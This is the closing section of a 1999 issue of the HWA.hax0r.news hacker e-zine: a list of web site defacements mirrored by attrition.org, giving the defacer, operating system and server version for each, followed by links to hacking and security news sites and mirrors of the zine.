      Defaced by: Ass0mbracao/OHB       
      Operating System: Windows NT (IIS/4.0)
      Previously defaced on 99.10.19 and 99.12.11 by OHB and Death Knights
      Potentially offensive content on defaced page.
       
       
      Defaced domain: www.acommedia.com
      Site Title: ACom Media Ltd
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.acommedia.com       
      Defaced by: phiber       
      Operating System: Red Hat Linux (Apache 1.3.3)
      Potentially offensive content on defaced page.
       
       
      Defaced domain: www.conagg.com
      Site Title: Construction Aggregate Equipment Company
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.conagg.com       
      Defaced by: Unknown since their HTML called a bad image.       
      Operating System: Windows NT (IIS/4.0)
      Potentially offensive content on defaced page.
       
       
      Defaced domain: www.ndn.co.jp
      Site Title: Nippon Data Net Limited Partnership
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.ndn.co.jp       
      Defaced by: nemesystm       
      Operating System: Windows NT (IIS/4.0)
      Previously defaced on 99.03.05   99.10.31   99.10.29 by xoloth1    ()         DHC
      Potentially offensive content on defaced page.
       
       
      Defaced domain: www.lyon.k12.ky.us
      Site Title: Kentucky K12 Schools
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.lyon.k12.ky.us       
      Defaced by: PurpleHaze       
      Operating System: Windows NT (IIS/4.0)
      Potentially offensive content on defaced page.
       
       
      Defaced domain: www.gddc.pt
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.gddc.pt       
      Defaced by: Shandar       
      Operating System: Windows NT (IIS/4.0)
      Potentially offensive content on defaced page.
       
       
      Defaced domain: www.cphv.org
      Site Title: Center to Prevent Handgun Violence
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.cphv.org       
      Defaced by: Ass0mbracao       
      Operating System: Windows NT (IIS/4.0)
      Previously defaced on 99.12.19 by Analognet
      Potentially offensive content on defaced page.
       
       
      Defaced domain: www.goprismatic.com
      Site Title: Totally Bogus Men Company
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/24/www.goprismatic.com       
      Defaced by: #phreak.nl       
      Operating System: Linux (Apache 1.3.4)
      Potentially offensive content on defaced page.
       
       
      Defaced domain: www.sicily.navy.mil
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/24/www.sicily.navy.mil       
      Defaced by: THESAINT666       
      Operating System: Windows NT
      Potentially offensive content on defaced page.
       
       
      Defaced domain: www.ordermed.com
      Site Title: ordermed
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/24/www.ordermed.com       
      Defaced by: BLN       
      Operating System: Windows NT (IIS/4.0)
      Potentially offensive content on defaced page.
       
       
      Defaced domain: www.mute300.net
      Site Title: MUTE300
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/24/www.mute300.net       
      Defaced by: crack & crx       
      Operating System: FreeBSD (Apache 1.2.6)
      Previously defaced on 99.11.17 by Sabu
      HIDDEN comments in the HTML.
      Potentially offensive content on defaced page.
       
       
      Defaced domain: www.domain-network.net
      Site Title: BLAH
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/24/www.domain-network.net       
      Defaced by: wired       
      Operating System: FreeBSD (Apache 1.2.6)
      Potentially offensive content on defaced page.
      
      Defaced domain: www.inet.tsinghua.edu.cn
      Site Title: Institute of Nuclear Energy Technology of Tsinghua University
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/24/www.inet.tsinghua.edu.cn       
      Defaced by: Bosnatek       
      Operating System: Solaris 2.5x
      Potentially offensive content on defaced page.
       
       
      Defaced domain: www.jadenterprises.com
      Site Title: J.A.D. Enterprises Inc.
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/24/www.jadenterprises.com       
      Defaced by: w0lf       
      Operating System: Irix? (Rapidsite/Apa-1.3.4)
      Potentially offensive content on defaced page.
       
       
      Defaced domain: www.asiplc.com
      Site Title: Automation Solutions, Inc.
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/25/www.asiplc.com       
      Defaced by: BLN       
      Operating System: Windows NT (IIS/4.0)
      Potentially offensive content on defaced page.
      
      Defaced domain: www.webquestcom.com
      Site Title: Conquest Communications, Inc.
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/25/www.webquestcom.com       
      Defaced by: Rhallado       
      Operating System: Windows NT (IIS/4.0)
      Potentially offensive content on defaced page.
       
       
      Defaced domain: www.networkmediadevices.com
      Site Title: Network Media Devices, Inc
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/25/www.networkmediadevices.com       
      Defaced by: BOG       
      Operating System: Linux (Apache 1.3.6)
      Potentially offensive content on defaced page.
       
       
      Defaced domain: www.colella.com.br
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/25/www.colella.com.br
      Operating System: Windows NT (IIS/4.0)
      Potentially offensive content on defaced page.
       
       
      Defaced domain: www.planet3000.com
      Site Title: Sebastian Harrison
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/25/www.planet3000.com       
      Defaced by: Rhallado       
      Operating System: Windows NT (IIS/4.0)
      Potentially offensive content on defaced page.
       
       
      Defaced domain: www.cafepiupiu.com.br
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/25/www.cafepiupiu.com.br       
      Defaced by: hts & white_course       
      Operating System: Windows NT (IIS/4.0)
      Potentially offensive content on defaced page.
       
       
      Defaced domain: www.presbycoalition.org
      Site Title: The Presbyterian Coalition
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/26/www.presbycoalition.org       
      Defaced by: BLN       
      Operating System: Windows NT (IIS/4.0)
      Potentially offensive content on defaced page.
       
       
      Defaced domain: www.vvs-online.com
      Site Title: V.V.S. bvba
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/26/www.vvs-online.com       
      Defaced by: illusions team       
      Operating System: Windows NT (IIS/4.0)
      Potentially offensive content on defaced page.
      
      Defaced domain: www.imagemine.com
      Site Title: imagemine
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/26/www.imagemine.com       
      Defaced by: BLN       
      Operating System: Windows NT (IIS/4.0)
      Potentially offensive content on defaced page.       
       
      
      Defaced domain: www.tdicomputers.com
      Site Title: Aerodiam nv
      Mirror: http://www.attrition.org/mirror/attrition/1999/12/26/www.tdicomputers.com       
      Defaced by: illusions team       
      Operating System: Windows NT (IIS/4.0)
      Potentially offensive content on defaced page.
     
 
        and more sites at the attrition cracked web sites mirror:

                     http://www.attrition.org/mirror/attrition/index.html 
 
       -------------------------------------------------------------------------
       
  A.0                              APPENDICES
       _________________________________________________________________________
       
       
       



  A.1 PHACVW, sekurity, security, cyberwar links
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      The links are no longer maintained in this file; there is now a
      links section at http://welcome.to/HWA.hax0r.news/ so check
      there for current links etc.

      The hack FAQ (The #hack/alt.2600 faq)
      http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html
      
      Hacker's Jargon File (The quote file)
      http://www.lysator.liu.se/hackdict/split2/main_index.html
      
      New Hacker's Jargon File.
      http://www.tuxedo.org/~esr/jargon/ 
      
      
      
      HWA.hax0r.news Mirror Sites around the world:
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://blkops.venomous.net/hwa_hax0r_news/hwa_hax0r_news.asp ** NEW **
      http://datatwirl.intranova.net  ** NEW **
      http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/ ** NEW **
      http://net-security.org/hwahaxornews ** NEW **
      http://www.sysbreakers.com/hwa ** NEW **
      http://www.attrition.org/hosted/hwa/
      http://www.attrition.org/~modify/texts/zines/HWA/
      http://www.hackunlimited.com/zine/hwa/ *UPDATED*
      http://www.ducktank.net/hwa/issues.html. ** NEW **
      http://www.alldas.de/hwaidx1.htm ** NEW **
      http://www.csoft.net/~hwa/ 
      http://www.digitalgeeks.com/hwa.*DOWN*
      http://members.tripod.com/~hwa_2k
      http://welcome.to/HWA.hax0r.news/
      http://archives.projectgamma.com/zines/hwa/.  
      http://www.403-security.org/Htmls/hwa.hax0r.news.htm
      http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
      http://hwa.hax0r.news.8m.com/           
      http://www.fortunecity.com/skyscraper/feature/103/  
      

      International links:(TBC)
      ~~~~~~~~~~~~~~~~~~~~~~~~~

      Foreign correspondents and others please send in news site links that
      have security news from foreign countries for inclusion in this list
      thanks... - Ed

      
          
      Belgium.......: http://securax.org/cum/ *New address*

      Brasil........: http://www.psynet.net/ka0z
                      http://www.elementais.cjb.net

      Canada........: http://www.hackcanada.com

      Croatia.......: http://security.monitor.hr

      Colombia......: http://www.cascabel.8m.com
                      http://www.intrusos.cjb.net

      Finland.......: http://hackunlimited.com/

      Germany.......: http://www.alldas.de/
                      http://www.security-news.com/

      Indonesia.....: http://www.k-elektronik.org/index2.html
                      http://members.xoom.com/neblonica/
                      http://hackerlink.or.id/

      Netherlands...: http://security.pine.nl/

      Russia........: http://www.tsu.ru/~eugene/

      Singapore.....: http://www.icepoint.com

      South Africa..: http://www.hackers.co.za
                      http://www.hack.co.za
                      http://www.posthuman.za.net

      Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first
                                               and best security related e-zine.
      
                      
                       
                      
                      
                      
    .za (South Africa) sites contributed by wyzwun tnx guy...                  
      
      


    Got a link for this section? email it to hwa@press.usmc.net and I'll
    review it and post it here if it merits it.
   
    
      
    @HWA
    

  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
    --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--

    © 1998, 1999 (c) Cruciphux/HWA.hax0r.news <tm> (R) { w00t }
    
  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-                       
     --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
   [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
       [45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]